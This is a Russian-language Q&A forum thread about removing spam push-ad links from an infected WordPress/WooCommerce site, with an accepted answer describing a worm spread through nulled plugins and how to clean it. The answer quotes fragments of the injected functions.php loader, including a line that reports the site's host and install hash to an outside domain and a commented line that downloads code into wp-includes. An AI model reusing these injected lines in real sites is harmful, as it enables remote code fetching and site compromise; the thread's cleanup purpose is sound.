legoex
@legoex
Пытаюсь стать программистом.

Как удалить нежелательные ссылки с WordPress сайта?

Здравствуйте мой сайт https://fogo.ua
получил вот такое письмо от Adwords сайт на Wordpress+Woocommerce...
Все кампании приостановили...
Просканировал сайт всем чем только можно было ничего не обнаружено..
В файлах тоже искал эти ссылки ничего нет...
ЧТо делать кто сталкивался

НА вашем сайте обнаружены нежелательные ссылки
deloton.com/apu.php?zoneid=1459841
go.mobisla.com/notice.php?p=1459844&interactive=1&pushup=1
go.pub2srv.com/apu.php?zoneid=1459841
go.pushnative.com/notice.php?p=1459844&interactive=1&pushup=1
  • Вопрос задан
  • 1201 просмотр
Решения вопроса 1
@Cristalius
результат появления этих ссылок это установка плагинов или тем со сторонних ресурсов, я допустим цепанул отсюда www.freenulled.top и определил методом 3х часовых исследований и вычислений, в папке плагина лежат файлы class.plugin-modules.php или class.theme-modules.php, удаляй сразу их на хостинге (проверь на всем сайте эти файлы), в них как раз начальный код установки червя который все подцепляет с сайта lanons.com или zanons.com. прописывает записи в functions.php и создает файлы.

идешь functions.php шаблона и там в самом начале увидишь:
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);

там далее.........

if ($ping) {
$content = @file_get_contents('www.lanons.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('www.lanons.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}
и конец.....
//install_code_end ?>

удаляй весь этот код

Далее идешь wp-includes/ и в самом низу увидишь файлы
wp-tmp.php
wp-vcd.php
wp-feed.php
wp-cd.php
удаляй их тоже, они все связаны с вирусом, в них как раз увидишь твои конечные ссылки

А лучше скачай сайт весь на комп и через notepad++ через поиск в файлах указываешь папку скаченного сайта и вводишь: домены своих ссылок, он проверит все файлы на наличие записей, удаляй их
далее вводи lanons.com и по той же схеме удаляешь весь код.
еще проверь наличие записей wp-tmp и других файлов которые выше написал

Ну вроде все ))
Ответ написан
Пригласить эксперта
Ответы на вопрос 4
@Nardil
Инженер-программист
Может вирус на сайте? Который генерирует скриптом сторонние ссылки. Проверьте сайт сервисом АйБолит, если есть возможность.
Ответ написан
@kachalabab
Аналогичная проблема, вы решили как то вопрос?
Антивирусы пробовал, переписывать сайт пробовал, но копировал вп-контент.
искал по файлам через нотепад++, не помогает
Ответ написан
legoex
@legoex Автор вопроса
Пытаюсь стать программистом.
Пока никак, у вас какие успехи?
Ответ написан
@solo__dj
Cristalius помогло.. осталось вычислить плагин занесший эту заразу... кстати https://aw-snap.info/file-viewer/ отличный сканер, без лишнего хлама
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через TM ID
Похожие вопросы
Spice IT Recruitment Москва
До 150 000 руб.
Zaymigo Нижний Новгород
До 50 000 руб.
A2 Design Омск
от 40 000 руб.
23 сент. 2018, в 11:49
30000 руб./за проект
23 сент. 2018, в 11:39
5000 руб./за проект
23 сент. 2018, в 09:27
300 руб./за проект